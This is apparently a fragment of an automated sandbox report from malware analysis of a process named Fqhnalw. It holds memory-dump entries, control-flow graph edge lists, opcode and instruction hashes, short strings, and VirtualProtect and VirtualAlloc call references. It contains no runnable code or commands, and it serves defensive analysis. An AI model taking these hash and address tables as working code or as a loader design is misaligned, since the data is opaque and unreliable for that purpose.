                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4
                                                              • API String ID: 0-4088798008
                                                              • Opcode ID: 1a71f396c95e236ffdc4fc7d53f5c031b9ce86f3ea63718ea50b6c671d17f765
                                                              • Instruction ID: dab0c0a073a5981dcae1edc132e780a9f0a1f30bc0707ccdb84ef2b6ebc77025
                                                              • Opcode Fuzzy Hash: 1a71f396c95e236ffdc4fc7d53f5c031b9ce86f3ea63718ea50b6c671d17f765
                                                              • Instruction Fuzzy Hash: BA22D874B00228CFDB64DFA5C994BA9B7B2FF48700F1481D9E509AB2A5DB71AD81CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1133 6b38690-6b386bb 1134 6b386c2-6b3870f 1133->1134 1135 6b386bd 1133->1135 1138 6b38712-6b38718 1134->1138 1135->1134 1139 6b38721-6b38722 1138->1139 1140 6b3871a 1138->1140 1149 6b3875f-6b3876b 1139->1149 1140->1139 1141 6b38960-6b389a5 1140->1141 1142 6b387b7-6b387e6 1140->1142 1143 6b38724-6b38755 1140->1143 1144 6b38aa4-6b38ab8 1140->1144 1145 6b38a64-6b38a9a 1140->1145 1146 6b388fb-6b3895b call 6b38040 1140->1146 1147 6b38aba-6b38ad7 1140->1147 1148 6b387e8-6b3885d call 6b38040 1140->1148 1140->1149 1150 6b3886e-6b388e8 1140->1150 1151 6b3876c-6b38798 1140->1151 1203 6b389a7-6b389ad 1141->1203 1204 6b389af-6b389b4 1141->1204 1182 6b387a2-6b387a8 1142->1182 1143->1138 1179 6b38757-6b3875d 1143->1179 1154 6b38a52-6b38a58 1144->1154 1145->1154 1178 6b38a9c-6b38aa2 1145->1178 1146->1182 1161 6b38b3b 1147->1161 1162 6b38ad9-6b38aed 1147->1162 1148->1182 1216 6b38863-6b38869 1148->1216 1150->1182 1219 6b388ee-6b388f6 1150->1219 1151->1182 1183 6b3879a-6b387a0 1151->1183 1166 6b38a61-6b38a62 1154->1166 1167 6b38a5a 1154->1167 1186 6b38b88-6b38b8e 1161->1186 1180 6b38af7-6b38afd 1162->1180 1181 6b38aef-6b38af5 1162->1181 1166->1144 1167->1144 1167->1145 1167->1147 1167->1166 1168 6b38bb3 1167->1168 1169 6b38bb0-6b38bb1 1167->1169 1170 6b38c1b-6b38c1c 1167->1170 1171 6b38c5b 1167->1171 1172 6b38b3a 1167->1172 1173 6b38b9a-6b38bae 1167->1173 1174 6b38c1e-6b38c4c 1167->1174 1175 6b38d04-6b38d05 1167->1175 1176 6b38cca-6b38cf5 1167->1176 1177 6b38b09-6b38b2e 1167->1177 1188 6b38bb4 1168->1188 1169->1188 1190 6b38c5c 1170->1190 1171->1190 1172->1161 1173->1186 1210 6b38c06-6b38c0f 1174->1210 1212 6b38c4e-6b38c59 1174->1212 1208 6b38d06 1175->1208 1213 6b38cb5-6b38cbe 1176->1213 1215 6b38cf7-6b38d02 1176->1215 1177->1180 1205 6b38b30-6b38b38 1177->1205 1178->1154 1179->1138 1192 6b38b06-6b38b07 1180->1192 1193 6b38aff 1180->1193 1181->1180 1194 6b387b1-6b387b2 1182->1194 1195 6b387aa 1182->1195 1183->1182 1197 6b38b90 1186->1197 1198 6b38b97-6b38b98 1186->1198 1188->1210 1190->1213 1192->1177 1193->1168 1193->1169 1193->1170 1193->1171 1193->1172 1193->1173 1193->1174 1193->1175 1193->1176 1193->1177 1193->1192 1194->1146 1195->1141 1195->1142 1195->1144 1195->1145 1195->1146 1195->1147 1195->1148 1195->1150 1195->1172 1195->1177 1195->1194 1197->1168 1197->1169 1197->1170 1197->1171 1197->1173 1197->1174 1197->1175 1197->1176 1197->1198 1198->1173 1203->1204 1206 6b389b6-6b389b7 1204->1206 1207 6b389b9-6b38a07 1204->1207 1205->1180 1206->1207 1224 6b38a11-6b38a16 1207->1224 1225 6b38a09-6b38a0f 1207->1225 1208->1208 1217 6b38c11 1210->1217 1218 6b38c18-6b38c19 1210->1218 1212->1210 1220 6b38cc0 1213->1220 1221 6b38cc7-6b38cc8 1213->1221 1215->1213 1216->1182 1217->1170 1217->1171 1217->1174 1217->1175 1217->1176 1217->1218 1218->1170 1219->1182 1220->1175 1220->1176 1220->1221 1221->1176 1226 6b38a1b-6b38a23 1224->1226 1227 6b38a18-6b38a19 1224->1227 1225->1224 1230 6b38a29 call 6b38f60 1226->1230 1231 6b38a29 call 6b38ed8 1226->1231 1227->1226 1228 6b38a2f-6b38a46 1228->1154 1229 6b38a48-6b38a50 1228->1229 1229->1154 1230->1228 1231->1228
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: 70ebd26fba7ea4d5f505fc51831b226fe8b659c8b6cf01ef30fee8abb92ac3ff
                                                              • Instruction ID: 5834459b6c32fd22e98fc5180eafc08e1a83ecd0fe31f95075ce77f730032ab3
                                                              • Opcode Fuzzy Hash: 70ebd26fba7ea4d5f505fc51831b226fe8b659c8b6cf01ef30fee8abb92ac3ff
                                                              • Instruction Fuzzy Hash: D5F1C5B0E05229CFEBA4CF69D844BA9B7B2FB49300F1091EAE40DA7355DB705985CF42

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1232 6b38686-6b386bb 1234 6b386c2-6b3870f 1232->1234 1235 6b386bd 1232->1235 1238 6b38712-6b38718 1234->1238 1235->1234 1239 6b38721-6b38722 1238->1239 1240 6b3871a 1238->1240 1249 6b3875f-6b3876b 1239->1249 1240->1239 1241 6b38960-6b389a5 1240->1241 1242 6b387b7-6b387e6 1240->1242 1243 6b38724-6b38755 1240->1243 1244 6b38aa4-6b38ab8 1240->1244 1245 6b38a64-6b38a9a 1240->1245 1246 6b388fb-6b3895b call 6b38040 1240->1246 1247 6b38aba-6b38ad7 1240->1247 1248 6b387e8-6b3885d call 6b38040 1240->1248 1240->1249 1250 6b3886e-6b388e8 1240->1250 1251 6b3876c-6b38798 1240->1251 1303 6b389a7-6b389ad 1241->1303 1304 6b389af-6b389b4 1241->1304 1282 6b387a2-6b387a8 1242->1282 1243->1238 1279 6b38757-6b3875d 1243->1279 1254 6b38a52-6b38a58 1244->1254 1245->1254 1278 6b38a9c-6b38aa2 1245->1278 1246->1282 1261 6b38b3b 1247->1261 1262 6b38ad9-6b38aed 1247->1262 1248->1282 1316 6b38863-6b38869 1248->1316 1250->1282 1319 6b388ee-6b388f6 1250->1319 1251->1282 1283 6b3879a-6b387a0 1251->1283 1266 6b38a61-6b38a62 1254->1266 1267 6b38a5a 1254->1267 1286 6b38b88-6b38b8e 1261->1286 1280 6b38af7-6b38afd 1262->1280 1281 6b38aef-6b38af5 1262->1281 1266->1244 1267->1244 1267->1245 1267->1247 1267->1266 1268 6b38bb3 1267->1268 1269 6b38bb0-6b38bb1 1267->1269 1270 6b38c1b-6b38c1c 1267->1270 1271 6b38c5b 1267->1271 1272 6b38b3a 1267->1272 1273 6b38b9a-6b38bae 1267->1273 1274 6b38c1e-6b38c4c 1267->1274 1275 6b38d04-6b38d05 1267->1275 1276 6b38cca-6b38cf5 1267->1276 1277 6b38b09-6b38b2e 1267->1277 1288 6b38bb4 1268->1288 1269->1288 1290 6b38c5c 1270->1290 1271->1290 1272->1261 1273->1286 1310 6b38c06-6b38c0f 1274->1310 1312 6b38c4e-6b38c59 1274->1312 1308 6b38d06 1275->1308 1313 6b38cb5-6b38cbe 1276->1313 1315 6b38cf7-6b38d02 1276->1315 1277->1280 1305 6b38b30-6b38b38 1277->1305 1278->1254 1279->1238 1292 6b38b06-6b38b07 1280->1292 1293 6b38aff 1280->1293 1281->1280 1294 6b387b1-6b387b2 1282->1294 1295 6b387aa 1282->1295 1283->1282 1297 6b38b90 1286->1297 1298 6b38b97-6b38b98 1286->1298 1288->1310 1290->1313 1292->1277 1293->1268 1293->1269 1293->1270 1293->1271 1293->1272 1293->1273 1293->1274 1293->1275 1293->1276 1293->1277 1293->1292 1294->1246 1295->1241 1295->1242 1295->1244 1295->1245 1295->1246 1295->1247 1295->1248 1295->1250 1295->1272 1295->1277 1295->1294 1297->1268 1297->1269 1297->1270 1297->1271 1297->1273 1297->1274 1297->1275 1297->1276 1297->1298 1298->1273 1303->1304 1306 6b389b6-6b389b7 1304->1306 1307 6b389b9-6b38a07 1304->1307 1305->1280 1306->1307 1324 6b38a11-6b38a16 1307->1324 1325 6b38a09-6b38a0f 1307->1325 1308->1308 1317 6b38c11 1310->1317 1318 6b38c18-6b38c19 1310->1318 1312->1310 1320 6b38cc0 1313->1320 1321 6b38cc7-6b38cc8 1313->1321 1315->1313 1316->1282 1317->1270 1317->1271 1317->1274 1317->1275 1317->1276 1317->1318 1318->1270 1319->1282 1320->1275 1320->1276 1320->1321 1321->1276 1326 6b38a1b-6b38a23 1324->1326 1327 6b38a18-6b38a19 1324->1327 1325->1324 1330 6b38a29 call 6b38f60 1326->1330 1331 6b38a29 call 6b38ed8 1326->1331 1327->1326 1328 6b38a2f-6b38a46 1328->1254 1329 6b38a48-6b38a50 1328->1329 1329->1254 1330->1328 1331->1328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: 4d1e5008f9281d8518a3bddcd8f919f06c4c990180a7ef430f7403484da6aa93
                                                              • Instruction ID: 1c004a9e0efe8d091c2bbcd238f0469796158efc0734c2e959f85184a3c864b5
                                                              • Opcode Fuzzy Hash: 4d1e5008f9281d8518a3bddcd8f919f06c4c990180a7ef430f7403484da6aa93
                                                              • Instruction Fuzzy Hash: 2BF1D3B0E05269CFEBA4CF69D844B9DB7B2FB49300F1091EAE409A7355EB705985CF42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: S8;
                                                              • API String ID: 0-184023343
                                                              • Opcode ID: 57bf597ae21c158ca47be0f0a52f319321e3bf10545a7f25764f019744f53b72
                                                              • Instruction ID: 0437eed57bf7dc6fcfc14298893caec34eab3b21351c7bbca2e53ac062118de4
                                                              • Opcode Fuzzy Hash: 57bf597ae21c158ca47be0f0a52f319321e3bf10545a7f25764f019744f53b72
                                                              • Instruction Fuzzy Hash: 44B13874E06218CFEB94DFAAD8847AEBBB5FB49300F20916AD009A7395DB345985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c08e7fbc5abbb70394c41b01e4a352d0602a13ccb730339d9ae4117ab78d7ec3
                                                              • Instruction ID: c30c257aa57a26b7f3cb926b2679b9f052c3617e05fc578fb92ab3d52a8c19b3
                                                              • Opcode Fuzzy Hash: c08e7fbc5abbb70394c41b01e4a352d0602a13ccb730339d9ae4117ab78d7ec3
                                                              • Instruction Fuzzy Hash: 51C12574E06259CFEB94DF6AD844BAEBBF6BB49300F1081AAD419A7394DB305D41CF80

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 23 6c05ee7-6c05eeb 24 6c05ef1-6c05efb 23->24 25 6c061ea-6c06251 23->25 24->25 32 6c06254 call 6b280b8 25->32 33 6c06254 call 6b28108 25->33 30 6c06256-6c06266 31 6c06270 30->31 31->31 32->30 33->30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$>
                                                              • API String ID: 0-3953377423
                                                              • Opcode ID: 23cf9341e343aff1f2ea20bf6efdcf5377e3a99fbe3ae6e86944e5950f5a4949
                                                              • Instruction ID: 343e367f18230b88e2db203a5a88127c4fbe1ddd17d0b593907d448179213f1e
                                                              • Opcode Fuzzy Hash: 23cf9341e343aff1f2ea20bf6efdcf5377e3a99fbe3ae6e86944e5950f5a4949
                                                              • Instruction Fuzzy Hash: 2B014C74A012289FEBA5DF54CDA4BECBBB1BF49304F5081D9D509AB290DB719E81CF40
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06BBDBCC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590481977.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6bb0000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: fe8b971cad96b83ea6d83c02dec1dc8098a4f739e52fcab717476faed4c5d2a7
                                                              • Instruction ID: 5bbc67aa85564172f7e2c5d0cf4f0a740dc270d2ac175f2bc4a1fe708b8e6cdf
                                                              • Opcode Fuzzy Hash: fe8b971cad96b83ea6d83c02dec1dc8098a4f739e52fcab717476faed4c5d2a7
                                                              • Instruction Fuzzy Hash: B211E5B19043099FDB10DFAAC484BEEFBF4EF48310F14842AD459A7240C7B99944CFA1
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 06BBEC3B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590481977.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6bb0000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1bff66cc25ec59cb376633225dc24996f9b39ac9439c3cb72956f1590c3693d5
                                                              • Instruction ID: 1e3291dacce90082f7e196d077b4aec5254ec4e43a4c24d2ac195a05df7ef244
                                                              • Opcode Fuzzy Hash: 1bff66cc25ec59cb376633225dc24996f9b39ac9439c3cb72956f1590c3693d5
                                                              • Instruction Fuzzy Hash: 851134B28003098FDB10DFAAC845BEEFBF5EF88320F14881AD559A7250C779A545CBA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: F
                                                              • API String ID: 0-1304234792
                                                              • Opcode ID: a5688fc5acd238754167301f5ebae645212d1c5fc0e67a7190512dd208498c4c
                                                              • Instruction ID: 24ae8750ec1d34ab3ef4dfc43a5e58ee94b893f30311b31368bcbd529ac1df8c
                                                              • Opcode Fuzzy Hash: a5688fc5acd238754167301f5ebae645212d1c5fc0e67a7190512dd208498c4c
                                                              • Instruction Fuzzy Hash: 13219D74905268CFEBA0DF65D944BEDBBB2AB49300F5085DAD50EA7280DB319E85DF00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %
                                                              • API String ID: 0-2567322570
                                                              • Opcode ID: dbb0b00522e33f9a7f66b768ebdcad03f46763f3f611bfcd0e14a1018f04c2ca
                                                              • Instruction ID: 9410ecbc68e0cc416307ee6e7d0d046c07ada2b12a1f13918d4ffbd9dbe42bcc
                                                              • Opcode Fuzzy Hash: dbb0b00522e33f9a7f66b768ebdcad03f46763f3f611bfcd0e14a1018f04c2ca
                                                              • Instruction Fuzzy Hash: 8D219A74901268CFEB61CF64DD48BEEBBB1AF49305F1484DAD909A7250C7729E86CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 9
                                                              • API String ID: 0-2366072709
                                                              • Opcode ID: 71b9e5a2a6f0c86123527a91d5366d46535995c54b1c79ec6c57d8f560bcc0ab
                                                              • Instruction ID: 6f48f78b341e78f4be01ddc0704eca8ac0c7307a7611208009e4599de9cee957
                                                              • Opcode Fuzzy Hash: 71b9e5a2a6f0c86123527a91d5366d46535995c54b1c79ec6c57d8f560bcc0ab
                                                              • Instruction Fuzzy Hash: E911C9B4A101288FCBA4DF24C89569EBBF5EF4A311F4041EAD64EAB350DB305E84CF05
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L
                                                              • API String ID: 0-2909332022
                                                              • Opcode ID: 082932f5a6576af8baa4ea89f2bd7ed1ffbbd4f3d7970ecf7b14edd0317f82d3
                                                              • Instruction ID: d5cce0f75082f7f4c18ab3f5257b6b7546f92387e193e528bdac0e4f825f7f97
                                                              • Opcode Fuzzy Hash: 082932f5a6576af8baa4ea89f2bd7ed1ffbbd4f3d7970ecf7b14edd0317f82d3
                                                              • Instruction Fuzzy Hash: AFF05AB4D042288FCB64CF24D9857C9BBB1BB58301F1081EAA649A3250DBB02EC0CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m
                                                              • API String ID: 0-3775001192
                                                              • Opcode ID: 894e3bfe22db02e603864e48a79f5fd77450ad3dc81248155e43e249f2c561ca
                                                              • Instruction ID: 26588fb05ce4b8c38d8470a783f167b7d85ff70f7a6b1630bc8e42e93a0b8b3f
                                                              • Opcode Fuzzy Hash: 894e3bfe22db02e603864e48a79f5fd77450ad3dc81248155e43e249f2c561ca
                                                              • Instruction Fuzzy Hash: E1E017B0A11369CFEB11AF64D85834A77B6FF00208F1002959509AB215DF315A658F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m
                                                              • API String ID: 0-3775001192
                                                              • Opcode ID: a10a155aaaec4cfb02d103dfe200e01c06c54972ff42a221d007c0bfd6dba213
                                                              • Instruction ID: c6a1c4b4664e34793a94d81ea805ec3e0d5b14ee3a8cd6bd4abe157c4def7743
                                                              • Opcode Fuzzy Hash: a10a155aaaec4cfb02d103dfe200e01c06c54972ff42a221d007c0bfd6dba213
                                                              • Instruction Fuzzy Hash: A4D05EB0A1037DCFFB51EB64D44475E37B7BB44208F004685D109AB304DB305D548F86
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0e37fab2eba1302f1164657cc0c13aa7be4d14eb864aecda0b2d21331657f15
                                                              • Instruction ID: 63c896021033c6d928a0c64d5ef98078bb17e9a52d25207b0a143f5832152240
                                                              • Opcode Fuzzy Hash: b0e37fab2eba1302f1164657cc0c13aa7be4d14eb864aecda0b2d21331657f15
                                                              • Instruction Fuzzy Hash: 4952E574E0420DCFDB95DFA4D448AAEBBB6FF89310F248055E512ABA90D7349D82CF91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c503ea0c2f89e1f0a4d825160a951f09dbb530a9e9d95acbbf50ec8f11ec4389
                                                              • Instruction ID: ead6ac1d6d134ee0cb3d1309c9c6f5a20f83c48c447eee415e019d281f7fa28a
                                                              • Opcode Fuzzy Hash: c503ea0c2f89e1f0a4d825160a951f09dbb530a9e9d95acbbf50ec8f11ec4389
                                                              • Instruction Fuzzy Hash: 4F224E70F00229CFDB55DFA5D894AAEBBB2FF48300F148156E511AB299EB74DD42CB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ae85a75cea69d66962ace428ed512c98630f424e7f28be4d10463575ef17652
                                                              • Instruction ID: 82bcd6ab7afc5c0fe5162bf7b8330ea8a288ab28f3271a421762bed0991b2095
                                                              • Opcode Fuzzy Hash: 4ae85a75cea69d66962ace428ed512c98630f424e7f28be4d10463575ef17652
                                                              • Instruction Fuzzy Hash: B822F330D15218CFDF94EFA8C9546ACBBB6BF49301F2084AAD41AAB749DB355E85CF40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bad9596fc67e39da7be540aaf4f66770691ddfd221579917eb7fea58990a94fb
                                                              • Instruction ID: d6af68cc93a64b55bba74bd9bd33b42e15e0879367cb2767e74b293e8e2a4999
                                                              • Opcode Fuzzy Hash: bad9596fc67e39da7be540aaf4f66770691ddfd221579917eb7fea58990a94fb
                                                              • Instruction Fuzzy Hash: 84F1E234E05308DFDBA8EFA4E4946ACBBB6FF49311F24446AE416AB754DB315981CF40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7b20c1108ef0cc57d9935f06ad3285d6d46eb70763690cf10e426ffca6c1df4
                                                              • Instruction ID: 9c87bc3ae8f8f5671c0af18adcb2ddc56c4ec7b5869472c4b577aa4af25f45e8
                                                              • Opcode Fuzzy Hash: c7b20c1108ef0cc57d9935f06ad3285d6d46eb70763690cf10e426ffca6c1df4
                                                              • Instruction Fuzzy Hash: CAC1F874E10209CFDB58EFA8D4546EDBBB6FF49311F20842AD412ABA54C7346E82CF90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 11934879e1248dcbb5978a1b29e0e596a7f3604ee9e9412e92ce39c45ab27ea9
                                                              • Instruction ID: a3b49d79cfb23d8f6c21b8a2da26cc1bbde9bf89afb313bae4d0e94c13225daf
                                                              • Opcode Fuzzy Hash: 11934879e1248dcbb5978a1b29e0e596a7f3604ee9e9412e92ce39c45ab27ea9
                                                              • Instruction Fuzzy Hash: FA81AA75B01219DFCB15CFA5E954AADBBF2EF88311F2040A9E902AB395DB35CD41CB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590592038.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c00000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15d31b4cfe5f8e3d00731c4d45ec5609b9697d4ecb6284e5f9040c22f1620fc2
                                                              • Instruction ID: 8776bdaf3ce51ca30460c27975726dd0d82eee82743c3f8b97eaaa5dd2bdc75d
                                                              • Opcode Fuzzy Hash: 15d31b4cfe5f8e3d00731c4d45ec5609b9697d4ecb6284e5f9040c22f1620fc2
                                                              • Instruction Fuzzy Hash: 37911474D05298CFEB94EFA9D884B9DBBB1FB48304F1081AAD419A7398DB305D85CF40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1589432360.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6970000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01f3cf5aefc4851bd2c38e4ebc755a44e0b0d4084cdc7208360e0722180bc5b5
                                                              • Instruction ID: 679095fcebec854413ba30c9c709ad28687025a9f3e6455238416a8c625d0d4c
                                                              • Opcode Fuzzy Hash: 01f3cf5aefc4851bd2c38e4ebc755a44e0b0d4084cdc7208360e0722180bc5b5
                                                              • Instruction Fuzzy Hash: BC51BD70D09389DFDB5ACB78C814BAE7FB4AF42300F18409AE151DB6E2C7346945CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9dd5a8c746ed15411c505f113c69a18431570d792b1180ac142256c8895e338e
                                                              • Instruction ID: 710904b1f62262dd0db853023da572b6475a08be58abf199eeca0d8dab758ede
                                                              • Opcode Fuzzy Hash: 9dd5a8c746ed15411c505f113c69a18431570d792b1180ac142256c8895e338e
                                                              • Instruction Fuzzy Hash: CC510471B10726CFC710CF28C484A6AFBB5FF85320B258599D9699B291C730F851CBD4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c036d42895354c18c308c678a8c1de7c97ae214ee81ab2cc69d0775e74ecd4a3
                                                              • Instruction ID: f384d087519f1fb3dd6638d0652761e97619477a70bee82e2fdf81feb955a108
                                                              • Opcode Fuzzy Hash: c036d42895354c18c308c678a8c1de7c97ae214ee81ab2cc69d0775e74ecd4a3
                                                              • Instruction Fuzzy Hash: BA514C76600100EFCB469FA9C804D6ABBB7FF8D32471680D4E2099B276DB32DC21EB51
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6b30000_Fqhnalw.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b58fb66d1a30bc0d5fb1cbd32fe1c2b046decc15e7afbaa49b6a395a0e8fd492
                                                              • Instruction ID: bed9222a511810870581bb13909e3a9cf0fb8a096b14bd5f18647d7d8cb55359
